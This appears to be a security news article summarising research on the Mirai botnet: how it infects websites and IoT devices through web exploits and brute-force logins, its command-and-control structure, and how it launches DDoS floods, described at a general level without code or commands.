The Mirai botnet is actively exploiting known web vulnerabilities to compromise over 1,200 sites across 780 customer accounts, as researchers have identified over 200 malicious URLs and 230 distinct malware samples, including bash scripts and ELF binaries, delivered through these attacks.
The botnet leverages these compromised sites to launch further attacks, demonstrating its ongoing evolution and persistent threat to internet infrastructure.
Attackers exploit web vulnerabilities to execute malicious bash scripts that download and install Mirai malware, which involves a first-stage script fetching a second-stage binary tailored to the target system’s architecture.
Simultaneously, the use of AI to create sophisticated DDoS attacks poses a serious threat because AI-powered polymorphic malware could evade detection and infect systems on a large scale, increasing the risk that Mirai botnets pose.
Explore the Inner Workings of a Notorious Botnet
A DDoS botnet attack involves a centralized control server issuing attack commands to a network of compromised devices (botnet), which floods a target with malicious traffic, overwhelming its resources, and causing a denial of service.
Botnets enhance DDoS attacks by obscuring the attacker’s identity, amplifying attack power, and distributing the attack across a vast, geographically dispersed network, making mitigation challenging.
The operators have shifted from spam-based monetization to extortion and DDoS-for-hire services like Mirai. The latter leverages the massive, weakly secured, and often neglected IoT device ecosystem.
These devices offer a large, homogenous attack platform due to their numbers, poor vendor security, consumer apathy, market growth, and standardized operating systems, making them highly attractive targets for botnet recruitment.
Mirai’s scanning workflow aggressively seeks out vulnerable devices for recruitment, and initiates a SYN port scan to probe the internet, identifying potential targets.
Following this, it attempts brute force authentication using simple pattern matching to compromise devices, and upon successful compromise, the scanner reports the newly infected device to a centralized command-and-control server, expanding the botnet’s reach.
The infection workflow commences with the identification of vulnerable devices. The loader subsequently processes the acquired data and deploys architecture-specific malware onto the target device.
After successful execution, the compromised device integrates into the botnet, actively participating in scanning and attack operations alongside other nodes.
According to Imperva, the botnet attack workflow initiates with the botmaster transmitting an attack command to the control server, while the command and control system disseminates specific attack instructions to individual nodes.
Upon receiving these directives, nodes concurrently execute the attack by flooding the target with packets at maximum rate while simultaneously maintaining their background scanning activities to continuously expand the botnet through the discovery and infection of new hosts.